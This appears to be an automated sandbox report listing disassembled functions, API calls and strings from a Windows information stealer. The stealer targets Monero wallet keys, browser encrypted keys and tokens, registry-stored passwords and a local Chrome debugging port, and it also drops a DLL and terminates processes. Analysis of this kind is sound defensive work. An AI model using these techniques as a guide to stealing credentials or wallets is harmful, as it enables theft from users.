                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8cd2c50297744383a409726615c89e3a24338305d1e017b1e5041af16c97504a
                              • Instruction ID: a240a320a0ffec9d3cd39b7b4f45322f4e9605907e64f9efaa56a8456997f8dc
                              • Opcode Fuzzy Hash: 8cd2c50297744383a409726615c89e3a24338305d1e017b1e5041af16c97504a
                              • Instruction Fuzzy Hash: 3A514C305101089BCB18FF61CDBAAED7379AF10348F50441FE54A576A2EF38AB15CB5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 5d25bfdb97660cbf0eddff05b742c52cbd74a974453bbbf37161c1016a04717c
                              • Instruction ID: b59bc061bb62546ddaf9b59a55e0a4da750f6ff776cdeae71f5e6e821d67b6df
                              • Opcode Fuzzy Hash: 5d25bfdb97660cbf0eddff05b742c52cbd74a974453bbbf37161c1016a04717c
                              • Instruction Fuzzy Hash: C2C1C4B5900108ABCB14EF60DCA9FEA7379BF54308F00459FF509A7341EA78AA85CF95
                              APIs
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D453C
                              • lstrcat.KERNEL32(?,012AE518), ref: 004D455B
                              • lstrcat.KERNEL32(?,?), ref: 004D456F
                              • lstrcat.KERNEL32(?,012AD080), ref: 004D4583
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D8F20: GetFileAttributesA.KERNEL32(00000000,?,004C1B94,?,?,004E577C,?,?,004E0E22), ref: 004D8F2F
                                • Part of subcall function 004CA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004CA489
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D9550: GlobalAlloc.KERNEL32(00000000,004D462D,004D462D), ref: 004D9563
                              • StrStrA.SHLWAPI(?,012AE560), ref: 004D4643
                              • GlobalFree.KERNEL32(?), ref: 004D4762
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA23F
                                • Part of subcall function 004CA210: LocalAlloc.KERNEL32(00000040,?,?,?,004C4F3E,00000000,?), ref: 004CA251
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA27A
                                • Part of subcall function 004CA210: LocalFree.KERNEL32(?,?,?,?,004C4F3E,00000000,?), ref: 004CA28F
                              • lstrcat.KERNEL32(?,00000000), ref: 004D46F3
                              • StrCmpCA.SHLWAPI(?,004E08D2), ref: 004D4710
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004D4722
                              • lstrcat.KERNEL32(00000000,?), ref: 004D4735
                              • lstrcat.KERNEL32(00000000,004E0FA0), ref: 004D4744
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 88ef23cc410f7fea2fd9bd96f7df61671e8f4ba6a860c3b98fffac304b546e3c
                              • Instruction ID: 3e1f01699a9b310f785e089a8c1759861b9723eabd1780f1869e33334b11c5c8
                              • Opcode Fuzzy Hash: 88ef23cc410f7fea2fd9bd96f7df61671e8f4ba6a860c3b98fffac304b546e3c
                              • Instruction Fuzzy Hash: 8D71AA76910208ABDB14EBA0DC59FEE7379AB88304F00859EF60597241DB38EB55CF59
                              APIs
                                • Part of subcall function 004C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C12B4
                                • Part of subcall function 004C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004C12BB
                                • Part of subcall function 004C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004C12D7
                                • Part of subcall function 004C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004C12F5
                                • Part of subcall function 004C12A0: RegCloseKey.ADVAPI32(?), ref: 004C12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 004C134F
                              • lstrlen.KERNEL32(?), ref: 004C135C
                              • lstrcat.KERNEL32(?,.keys), ref: 004C1377
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004C1465
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                              • DeleteFileA.KERNEL32(00000000), ref: 004C14EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: e26c140dc5597c27500f1c72f12e62f12c4e37e2b0a40ef86e58130d3522abfe
                              • Instruction ID: 8f4b24112f36184306cc985b83a6e5f1be3e38d48217bf1768878b3dd2b98fde
                              • Opcode Fuzzy Hash: e26c140dc5597c27500f1c72f12e62f12c4e37e2b0a40ef86e58130d3522abfe
                              • Instruction Fuzzy Hash: 7551A3B19101185BCB14EB61DCA6FED737C9F50304F4045DFB20A62192EE386B99CB6E
                              APIs
                              • InternetOpenA.WININET(004E0AF6,00000001,00000000,00000000,00000000), ref: 004C9A6A
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004C9AAB
                              • InternetCloseHandle.WININET(00000000), ref: 004C9AC7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: Internet$Open$CloseHandle
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 3289985339-2144369209
                              • Opcode ID: b72e5ace5e6f2d58fb530fb4a8c0e4f27a0c01e51d3f90cf2a57a342d3d9f47b
                              • Instruction ID: a0ff88fb5f5dc20cdd515df9274fd58ee19be2ab56c74dd71886a696978a6a52
                              • Opcode Fuzzy Hash: b72e5ace5e6f2d58fb530fb4a8c0e4f27a0c01e51d3f90cf2a57a342d3d9f47b
                              • Instruction Fuzzy Hash: F9412E35A50258ABCB14EF95CC99FDD7774BB48740F10409FF505AB290DBB8AE80CB68
                              APIs
                                • Part of subcall function 004C7330: memset.MSVCRT ref: 004C7374
                                • Part of subcall function 004C7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004C739A
                                • Part of subcall function 004C7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004C7411
                                • Part of subcall function 004C7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004C746D
                                • Part of subcall function 004C7330: GetProcessHeap.KERNEL32(00000000,?), ref: 004C74B2
                                • Part of subcall function 004C7330: HeapFree.KERNEL32(00000000), ref: 004C74B9
                              • lstrcat.KERNEL32(00000000,004E192C), ref: 004C7666
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C76A8
                              • lstrcat.KERNEL32(00000000, : ), ref: 004C76BA
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C76EF
                              • lstrcat.KERNEL32(00000000,004E1934), ref: 004C7700
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C7733
                              • lstrcat.KERNEL32(00000000,004E1938), ref: 004C774D
                              • task.LIBCPMTD ref: 004C775B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: a2dc543b80b685839a98504a069d7a4c67bcc5d74a80f774ac3cdb4b788447ce
                              • Instruction ID: 5b07481e4e477d7f8801fd9ea54998f51c7b048a8454d8b98981afa2914980d4
                              • Opcode Fuzzy Hash: a2dc543b80b685839a98504a069d7a4c67bcc5d74a80f774ac3cdb4b788447ce
                              • Instruction Fuzzy Hash: 30314F75A14108DFDB48EBA5DCA6EFE7379AB44305B10821EF102672A1DE3CA946CB5C
                              APIs
                              • memset.MSVCRT ref: 004C7374
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004C739A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004C7411
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004C746D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004C74B2
                              • HeapFree.KERNEL32(00000000), ref: 004C74B9
                              • task.LIBCPMTD ref: 004C75B5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 79f5ab4929fc9aef44e510632b305c38b3fcca1592c9af94e2412d17b2d53a0c
                              • Instruction ID: fdc31df0d24c33b72dfd5afd4baff93dd157f161e9d9a220458c7204eccd6893
                              • Opcode Fuzzy Hash: 79f5ab4929fc9aef44e510632b305c38b3fcca1592c9af94e2412d17b2d53a0c
                              • Instruction Fuzzy Hash: 11614BB58141689BDB64DB51CC41FDAB3B8BF44304F0081EEE689A6241DFB46BC9CF98
                              APIs
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                              • wsprintfA.USER32 ref: 004C9E7F
                              • memset.MSVCRT ref: 004C9EED
                              • lstrcat.KERNEL32(00000000,?), ref: 004C9F03
                              • lstrcat.KERNEL32(00000000,?), ref: 004C9F17
                              • lstrcat.KERNEL32(00000000,004E12D8), ref: 004C9F29
                              • lstrcpy.KERNEL32(?,00000000), ref: 004C9F7C
                              • memset.MSVCRT ref: 004C9F9C
                              • Sleep.KERNEL32(00001388), ref: 004CA013
                                • Part of subcall function 004D99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D99C5
                                • Part of subcall function 004D99A0: Process32First.KERNEL32(004CA056,00000128), ref: 004D99D9
                                • Part of subcall function 004D99A0: Process32Next.KERNEL32(004CA056,00000128), ref: 004D99F2
                                • Part of subcall function 004D99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D9A4E
                                • Part of subcall function 004D99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 004D9A6C
                                • Part of subcall function 004D99A0: CloseHandle.KERNEL32(00000000), ref: 004D9A79
                                • Part of subcall function 004D99A0: CloseHandle.KERNEL32(004CA056), ref: 004D9A88
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                              • String ID: D
                              • API String ID: 3242155833-2746444292
                              • Opcode ID: 68637387f5ae4dfde11cd40b328e78281b55ec7a1092ab539510dd5e28db6220
                              • Instruction ID: 5c1d39e0f86f4a2b4078ecf00ede224b669a095c507eed220cba1bc4c2242f2d
                              • Opcode Fuzzy Hash: 68637387f5ae4dfde11cd40b328e78281b55ec7a1092ab539510dd5e28db6220
                              • Instruction Fuzzy Hash: BA51C7B1944308ABEB24DB60DC5AFDA7378AF44704F00459EB20DAB2C1EB75AB84CF55
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                              • InternetOpenA.WININET(004E0DFB,00000001,00000000,00000000,00000000), ref: 004C615F
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6197
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004C61DF
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004C6203
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 004C622C
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004C625A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 004C6299
                              • InternetCloseHandle.WININET(?), ref: 004C62A3
                              • InternetCloseHandle.WININET(00000000), ref: 004C62B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 754132e2a591285d70700edf7340e22fb96ea10e9cd4d3b1e7d2fb95c6d59792
                              • Instruction ID: df16cac50fc0230be5d0811b15678adbcb558289014007f5a5840150a47dffbe
                              • Opcode Fuzzy Hash: 754132e2a591285d70700edf7340e22fb96ea10e9cd4d3b1e7d2fb95c6d59792
                              • Instruction Fuzzy Hash: 755194B5A40208ABDB64DF90CC55FEE7779AB44305F00809EF605A72C0DB786A86CF5D
                              APIs
                              • type_info::operator==.LIBVCRUNTIME ref: 0054024D
                              • ___TypeMatch.LIBVCRUNTIME ref: 0054035B
                              • CatchIt.LIBVCRUNTIME ref: 005403AC
                              • CallUnexpected.LIBVCRUNTIME ref: 005404C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2356445960-393685449
                              • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction ID: 1caf5f7f1c8cee4401d004a615dd97088df947b45fcd18405c135e96f5692856
                              • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction Fuzzy Hash: 5CB19D35C0020AEFCF15DFA4C8899EEBFB4BF54318F20555AEA116B292D370DA51CB91
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • lstrlen.KERNEL32(00000000), ref: 004CBC6F
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 004CBC9D
                              • lstrlen.KERNEL32(00000000), ref: 004CBD75
                              • lstrlen.KERNEL32(00000000), ref: 004CBD89
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: e80bc3f631282e6ee657ab0d2a00fc0b87f427d1212454ac7d6ed3dc02f23951
                              • Instruction ID: f046a2f6fd61861a8003e33697223dae00fba9ecaa7ca721405421786f5ebb24
                              • Opcode Fuzzy Hash: e80bc3f631282e6ee657ab0d2a00fc0b87f427d1212454ac7d6ed3dc02f23951
                              • Instruction Fuzzy Hash: 4AB150719101089BCB04EBA1CCB6EEE7379AF14304F40455FF506632A1EF386A59CB6A
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 54046e8f13c9ff462f7f0af78c63c5d5ae8fd66193755f6963fc62e0d172803a
                              • Instruction ID: a92432c64e77efd34c7729d5c28b397ca56f9838662416ea5b3f77a5d165f78d
                              • Opcode Fuzzy Hash: 54046e8f13c9ff462f7f0af78c63c5d5ae8fd66193755f6963fc62e0d172803a
                              • Instruction Fuzzy Hash: BDF05E3099C209EFD3489FE0EA0A75CBB30EB45707F118197F74996290C6784A51DB5D
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004D08DC,C:\ProgramData\chrome.dll), ref: 004D9871
                                • Part of subcall function 004CA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004CA098
                              • StrCmpCA.SHLWAPI(00000000,012A90A8), ref: 004D0922
                              • StrCmpCA.SHLWAPI(00000000,012A8F58), ref: 004D0B79
                              • StrCmpCA.SHLWAPI(00000000,012A8FB8), ref: 004D0A0C
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004D0C35
                              Strings
                              • C:\ProgramData\chrome.dll, xrefs: 004D08CD
                              • C:\ProgramData\chrome.dll, xrefs: 004D0C30
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                              • API String ID: 585553867-663540502
                              • Opcode ID: 79c3b8216209de838acf505be7a375329b81cbdbae1a02c3acad3735275bbef9
                              • Instruction ID: 1eab2907a7dc06f25d8895c0bc8860f824c84d6260511216358760c135c24c97
                              • Opcode Fuzzy Hash: 79c3b8216209de838acf505be7a375329b81cbdbae1a02c3acad3735275bbef9
                              • Instruction Fuzzy Hash: 03A185717002089FCB18EF65C9A6FAD77B6AF95304F10816FE40A4F351DA34DA0ACB96
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 0053FA1F
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0053FA27
                              • _ValidateLocalCookies.LIBCMT ref: 0053FAB0
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0053FADB
                              • _ValidateLocalCookies.LIBCMT ref: 0053FB30
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004C501A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C5021
                              • InternetOpenA.WININET(004E0DE3,00000000,00000000,00000000,00000000), ref: 004C503A
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004C5061
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004C5091
                              • InternetCloseHandle.WININET(?), ref: 004C5109
                              • InternetCloseHandle.WININET(?), ref: 004C5116
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,012AE260,00000000,?,004E0E14,00000000,?,00000000), ref: 004D82C0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D82C7
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004D82E8
                              • wsprintfA.USER32 ref: 004D833C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004D85B6
                              • wsprintfA.USER32 ref: 004D85E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004D860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D8629
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              • RegQueryValueExA.ADVAPI32(00000000,012AE398,00000000,000F003F,?,00000400), ref: 004D867C
                              • lstrlen.KERNEL32(?), ref: 004D8691
                              • RegQueryValueExA.ADVAPI32(00000000,012AE368,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,004E0B3C), ref: 004D8729
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D8798
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D87AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D99C5
                              • Process32First.KERNEL32(004CA056,00000128), ref: 004D99D9
                              • Process32Next.KERNEL32(004CA056,00000128), ref: 004D99F2
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D9A4E
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D9A6C
                              • CloseHandle.KERNEL32(00000000), ref: 004D9A79
                              • CloseHandle.KERNEL32(004CA056), ref: 004D9A88
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7834
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D783B
                              • RegOpenKeyExA.ADVAPI32(80000002,0129BFA0,00000000,00020119,00000000), ref: 004D786D
                              • RegQueryValueExA.ADVAPI32(00000000,012AE320,00000000,00000000,?,000000FF), ref: 004D788E
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D7898
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D78C4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D78CB
                              • RegOpenKeyExA.ADVAPI32(80000002,0129BFA0,00000000,00020119,004D7849), ref: 004D78EB
                              • RegQueryValueExA.ADVAPI32(004D7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 004D790A
                              • RegCloseKey.ADVAPI32(004D7849), ref: 004D7914
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              APIs
                              • CreateFileA.KERNEL32(>=M,80000000,00000003,00000000,00000003,00000080,00000000,?,004D3D3E,?), ref: 004D948C
                              • GetFileSizeEx.KERNEL32(000000FF,>=M), ref: 004D94A9
                              • CloseHandle.KERNEL32(000000FF), ref: 004D94B7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
